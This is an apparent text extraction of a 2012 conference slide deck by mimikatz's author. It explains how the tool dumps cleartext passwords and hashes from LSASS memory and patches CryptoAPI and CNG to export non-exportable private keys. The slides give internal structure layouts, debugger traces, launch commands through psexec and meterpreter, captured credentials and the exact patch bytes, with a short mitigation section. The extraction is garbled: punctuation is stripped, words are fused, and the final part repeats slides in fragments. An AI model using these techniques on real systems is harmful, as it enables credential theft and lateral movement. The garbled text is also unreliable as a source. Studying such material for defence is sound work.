mimikatz @ asfws - Gentil Kiwi · 2014. 8. 21. · mimikatz working On XP, 2003, Vista, 2008,...

mimikatz

Benjamin DELPY `gentilkiwi`focus on sekurlsapass-the-pass

and crypto patches

Who Why

Benjamin DELPY `gentilkiwi`ndash Frenchndash 26yndash Kiwi addictndash Lazy programmer

Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits

Why all in French ndash because Irsquom ndash It limits script kiddies usagendash Hack with class

07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 2

mimikatzworking

On XP 2003 Vista 2008 Seven 2008r2 8 Server 8

ndash x86 amp x64ndash 2000 support dropped with mimikatz 10

Everywhere itrsquos statically compiled

Two modes

ndash direct action (local commands) ndash process or driver communication


sekurlsadll

mimikatzexe

KeyIsolaquo Isolation de cleacute CNG raquo

LSASSEXE

Direct action cryptopatchcng

EventLoglaquo Journal drsquoeacuteveacutenements Windows raquo

SVCHOSTEXE

Direct action diverseventdrop

mimikatzexe

SamSSlaquo Gestionnaire de comptes de seacutecuriteacute raquo

LSASSEXE

VirtualAllocEx WriteProcessMemory CreateRemoteThread

Open a pipeWrite a welcome messageWait commandshellip and return results

mimikatzarchitecture of sekurlsa amp crypto


mimikatzexe

mod_mimikatz_sekurlsa

mod_mimikatz_nogpo

mod_mimikatz_divers

mod_mimikatz_winmine

mod_mimikatz_impersonate

mod_mimikatz_inject

mod_mimikatz_samdump

mod_mimikatz_standard

mod_mimikatz_crypto

mod_mimikatz_handle

mod_mimikatz_system

mod_mimikatz_service

mod_mimikatz_process

mod_mimikatz_thread

mod_mimikatz_terminalserver

mod_mimikatz_privilege

mod_pipe

mod_inject

mod_memory

mod_parseur

mod_patch

mod_hive

mod_secacl

mod_privilege

mod_process

mod_service

mod_system

mod_thread

mod_ts

mod_text

mod_crypto

mod_cryptoapi

mod_cryptoacng

msv_1_0

tspkg

wdigest

livessp

kerberos

kappfreedll

kelloworlddll

klockdll

mimikatzsys

sekurlsadll

sam

secrets

msv_1_0

wdigest

livessp

kerberos

tspkg

mimikatz sekurlsawhat is it

A module replacement for my previous favorite library

A local module that can read data from the SamSS Service (well known LSASS process)

What sekurlsa module can dump ndash MSV1_0 hashes

ndash TsPkg passwords

ndash Wdigest passwords

ndash LiveSSP passwords

ndash Kerberos passwords ()

ndash hellip



mimikatz sekurlsahow LSA works ( level)


LsaSSWinLogon

AuthenticationPackagesmsv1_0

tspkg

wdigest

livessp

kerberos

Authentication

msv1_0

kerberos

SAM

ChallengeResponse

userdomainpassword

PLAYSKOOL


Authentication packages

ndash take userrsquos credentials from the logon

ndash make their own stuff

ndash keep enough data in memory to compute responses of challenges (Single Sign On)

If we can get data and inject it in another session of LSASS we avoid authentication part

This is the principle of laquo Pass-the-hash raquo

ndash In fact of laquo Pass-the-x raquo


PLAYSKOOL

mimikatz sekurlsahistory of laquo pass-the- raquo 12

Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)

ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)

ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it

ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)

ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))

2007 was the year of pass the hash

Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket

support Hernan Ochoa (Ampliasecurity)



Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT

6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass

ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))

bull httpbloggentilkiwicomsecuritere-pass-the-pass

ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip

hellipLots of timehellip

ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz

ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip

bull httpseclistsorgpen-test2012Mar7

ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory

bull httpbloggentilkiwicomsecuriterere-pass-the-pass

ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass

ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition


mimikatz sekurlsa tspkg

because sometimes hash is not enoughhellip


mimikatz sekurlsa tspkgwhat is it

Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx

Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-

9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf

First impression it seems cool ndash User does not have to type its password

ndash Password is not in RDP file

ndash Password is not in user secrets


mimikatz sekurlsa tspkgquestions

KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to

Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx

bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip

In what form Our specs [MS-CSSP]

ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated

to the server (or PIN) TSPasswordCreds = SEQUENCE

domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING

ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip

So password resides somewhere in memory


mimikatz sekurlsa tspkgsymbols amp theory

Letrsquos explore some symbols

ndash sounds coolhellip (thanks Microsoft)

Letrsquos imagine a scenariondash Enumerate all sessions to obtain

bull Username

bull Domain

bull LUID

ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain

bull TS_CREDENTIAL

ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for

bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip


kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt

mimikatz sekurlsa tspkgworkflow


RtlLookupElementGenericTableAvl

LsaUnprotectMemory

KIWI_TS_CREDENTIAL

KIWI_TS_PRIMARY_CREDENTIAL

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password

KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL

LsaEnumerateLogonSessions

for each LUID

password in clear

tspkgTSGlobalCredTable

typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64

BYTE unk0[108]elif defined _M_IX86

BYTE unk0[64]endif

LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary

KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN

TIAL

mimikatz sekurlsa tspkgdemo time

sekurlsatspkg


mimikatz sekurlsa wdigest

because clear text password over httphttps is not cool


mimikatz sekurlsa wdigestwhat is it

ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication

ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service

using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx

Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm

bull Only with Advanced Digest authentication



We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)

bull HA1 = MD5(usernamerealmpassword)

bull HA2 = MD5(methoddigestURI[hellip])

Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon

WDigest provider must have elements to compute responses for different servers ndash Username

ndash Realm (from server)

ndash Password


mimikatz sekurlsa wdigesttheory

This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect

with LsaProtectMemory)

LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest

ndash Hypothesis seems verified

LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest

ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList


text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]

text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]

mimikatz sekurlsa wdigestworkflow


LsaUnprotectMemory


for each LUID

typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]

KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY

wdigestl_LogSessList

search linked list for LUID

KIWI_WDIGEST_LIST_ENTRY

password in clear

mimikatz sekurlsa wdigestdemo time

sekurlsawdigest


mimikatz sekurlsa livessp

because Microsoft was too good in closed networks


mimikatz sekurlsa livessphow

Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading

ndash Symbols searching

~ Boring ~hellip be more brutal this time make a WinDBG trap


0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4

DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe

0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g


Letrsquos login with a Live account on Windows 8

After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)


lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2

lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials

lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials

1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)

Our LiveSSP provider

Yeah Pass the Hash capability with Live account toohellip

Live user can logon through RDP via SSO

mimikatz sekurlsa livesspworkflow


LsaUnprotectMemory


for each LUID

password in clear

typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds

KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY

livesspLiveGlobalLogonSessionList


KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password

KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL

mimikatz sekurlsa

Even if we already have tools for normal accounts are you not curious to test one with this trap


Me yes

mimikatz sekurlsa kerberos

Letrsquos login normal account

After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in

KerbGlobalLogonSessionTable

ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList


lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials

lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials


lsasrvLsaProtectMemorywdigestSpAcceptCredentials


Kerberos part for password

Kerberos ticket part Maybe )

mimikatz sekurlsa kerberos (nt6)workflow



LsaUnprotectMemory

KIWI_KERBEROS_PRIMARY_CREDENTIAL

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL

DWORD unk0PVOID unk1PVOID unk2PVOID unk3

ifdef _M_X64BYTE unk4[32]

elif defined _M_IX86BYTE unk4[20]

endifLUID LocallyUniqueIdentifier



endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password

KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL


for each LUID

password in clear


KerberosKerbGlobalLogonSessionTable



LsaUnprotectMemory


for each LUID

password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier

ifdef _M_IX86DWORD unk8

endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password

KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION

kerberosKerbLogonSessionList


KIWI_LIVESSP_PRIMARY_CREDENTIAL

mimikatz sekurlsademo time

Final sekurlsa demo sekurlsalogonPasswords full


mimikatz sekurlsa kerberosldquohu rdquo

Ok It workshellip

But why

Not at all logon on NT5 (can need an unlock)

From my understanding of Microsoft explanations

ndash no need of passwords for the Kerberos protocolhellip

ndash all is based on the hash (not very sexy too)

Microsoftrsquos implementation of Kerberos is full of logicalhellip

ndash For password auth

bull password hash for shared secret but keeping password in memory

ndash For full smartcard auth

bull No password on client

bull No hash on client

ndash NTLM hash on clienthellip

ndash KDC sent it back as a gift


mimikatz sekurlsa

All passwords in memory are encrypted but in a reversible way to be used

We used LsaUnprotecMemory in the LSASS context to decrypt them

ndash This function rely on LsaEncryptMemory from lsasrvdll

For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it

Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip

mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have

the same comportments than when we are in LSASS


LsaUnprotectMemory

mimikatz sekurlsaLsaEncryptMemory NT5

Depending on the size of the secret LsaEncryptMemory use

ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES


InitializationVector BYTE[16]

lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey

typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc

KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA

hAesKey

lsasrv typedef struct _KIWI_BCRYPT_KEY

DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1

KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY

mimikatz sekurlsamemo

Security Packages

Protection Keys


Package Symbols Type

tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE

wdigest wdigestl_LogSessList LIST_ENTRY

livessp livesspLiveGlobalLogonSessionList LIST_ENTRY

kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY

kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE

msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount

LIST_ENTRYULONG

Key NT 5 Symbols

RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey

DESx lsasrvg_pDESXKeylsasrvg_Feedback

Key NT 6 Symbols

lsasrvInitializationVector

3DES lsasrvh3DesKey

AES lsasrvhAesKey


Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit

psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit

meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe


mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz

mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK

mimikatz sekurlsalogonPasswords full

Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x

msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a

kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234

wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234

tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234

livessp nt (LUID KO)

mimikatz sekurlsawhat we can do

Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks

More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic

bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on

ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers

bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0


mimikatz cryptowhat is it

A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys

ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable

What crypto module can do ndash List

bull Providers

bull Stores

bull Certificates

bull Keys

ndash Exportbull Certificates

ndash public in DER format

ndash with private keys in PFX format

bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too

ndash Patchbull CryptoAPI in mimikatz context

bull CNG in LSASS context (again )


mod_mimikatz_crypto

mimikatz cryptohow itrsquos protected

Private keys are DPAPI protectedndash You cannot reuse private key files on another computer

bull At least without the master keys andor password of users

ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo

ExportUsage can be limited by ndash Password

ndash Popup

ndash ExportArchive flag no present


Constraint for most userUnavailable for computer keys

certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport

mimikatz crypto capihow it works

ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx

Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip

Process deal with cryptographic keys by this APIhellip


mimikatz crypto capihow itrsquos exported ( level)


Process

CryptoAPI and RSA CSP

Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key

mimikatz crypto patchcapibecause I own my process

When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey

This function do all the work to prepare the export and check if the key is exportable


mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy

- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO

(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK

================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e

Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10

La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute

Exportable


So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it

I wrote ldquo4rdquo bytes in my memory space


text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive

text0AC0B7CB 90 nop

text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive

text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare

text0AC1F749 90 nop

text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare

mimikatz crypto patchcapidemo time

Import export import as not exportablehellip export


mimikatz crypto patchcapilimitations

Because ndash Irsquom lazy

ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip

mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10

ndash Microsoft Enhanced Cryptographic Provider v10

ndash Microsoft Enhanced RSA and AES Cryptographic Provider

ndash Microsoft RSA SChannel Cryptographic Provider

ndash Microsoft Strong Cryptographic Provider

hellipall based on rsaenhdll


mimikatz crypto cnghow it works

ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx

ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default

This time keys operations are not made in the ldquouserrdquo process context

Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions

It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip


mimikatz crypto cnghow itrsquos exported ( level)

KeyIso Service (LSASS Process)


Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key

NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP

no

mimikatz crypto patchcngbecause sometimes I own LSASS

When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey



mimikatz cryptoexportKeys[user] Cleacutes CNG

- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO

mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge

Exportable


This time checks and keys are in LSASS processhellipAnd what

I wrote ldquo1rdquo byte in LSASS memory spacehellip


text6C815210 75 1C jnz short continue_key_export

text6C815210 EB 1C jmp short continue_key_export

mimikatz crypto patchcngdemo time

Import export import as not exportablehellip export again


mimikatz crypto patchcnglimitations

Patch operation needs some privilegesndash Admin (debug privilege)

ndash SYSTEM

mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)

Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip


mimikatz crypto patchcngbonus

After one admin patched LSASS all users of current system benefit of extra exports

ndash until reboot KeyIso service restart

Some others programs that doesnrsquot check the export flag before asking export can work too

ndash Yeah like the old good one certutil


CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b

Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider

La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute



Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement

mimikatz cryptomemo

Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit

psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng

cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit

mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop

mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates

cryptoexportKeys exit

Password ndash PFX files are protected by this password mimikatz

Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys

ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it


mimikatz cryptowhat we can do

Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip

Basicsndash Use smartcardstoken for users certificates

ndash Use Hardware Security Modules (HSM) even SoftHSM

More in depthndash See what Microsoft can do with TPM from Windows 8

bull Virtual SmartCard seems promising

ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )


mimikatzwhat else can it do

Play with minesweeper

Manipulate some handles

Pass the hash

Dump SAM AD

Stop event monitoring

Patch Terminal Server

Basic GPO bypass

Applocker SRP bypass

Driverndash Play with tokens amp privileges

ndash Display SSDT x86 amp x64

ndash List minifilters actions

ndash List Notifications (process thread image registry)

ndash List Objects hooks and procedures

ndash hellip

hellip


mimikatzthatrsquos all folks

Thanksrsquo to Merci agrave

ndash my girlfriend for her support (her LSASS crashed few times)

ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure

ndash Microsoft to always consider it as normalacceptable

ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip

ndash You for your attention

Questions

Donrsquot be shy )

especially if you have written the corresponding slide number


Blog Source Code amp Contact

blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom


Who Why

Benjamin DELPY `gentilkiwi`ndash Frenchndash 26yndash Kiwi addictndash Lazy programmer

Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits

Why all in French ndash because Irsquom ndash It limits script kiddies usagendash Hack with class


mimikatzworking




Two modes



sekurlsadll

mimikatzexe


LSASSEXE



SVCHOSTEXE


mimikatzexe


LSASSEXE





mimikatzexe


mod_mimikatz_nogpo

mod_mimikatz_divers



mod_mimikatz_inject



mod_mimikatz_crypto

mod_mimikatz_handle

mod_mimikatz_system



mod_mimikatz_thread



mod_pipe

mod_inject

mod_memory

mod_parseur

mod_patch

mod_hive

mod_secacl

mod_privilege

mod_process

mod_service

mod_system

mod_thread

mod_ts

mod_text

mod_crypto

mod_cryptoapi

mod_cryptoacng

msv_1_0

tspkg

wdigest

livessp

kerberos

kappfreedll

kelloworlddll

klockdll

mimikatzsys

sekurlsadll

sam

secrets

msv_1_0

wdigest

livessp

kerberos

tspkg









ndash hellip





LsaSSWinLogon


tspkg

wdigest

livessp

kerberos

Authentication

msv1_0

kerberos

SAM

ChallengeResponse

userdomainpassword

PLAYSKOOL










